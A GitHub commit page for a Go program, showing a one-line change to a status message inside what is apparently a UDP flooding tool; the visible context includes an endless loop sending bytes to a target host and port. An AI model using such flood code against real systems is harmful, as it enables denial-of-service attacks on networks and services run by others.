This commit is contained in:
Fijxu 2021-06-20 16:37:49 -04:00 committed by GitHub
parent 839c241020
commit a2e09b06db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -13,7 +13,7 @@ func main() {
if err != nil {
print(err)
} else {
fmt.Println("Attack Sent To " + target + " Using Port " + port + " With udphex!")
fmt.Println("Attack Sent To " + target + ":" + port)
for {
conn.Write([]byte("\x61\x73\x64"))
}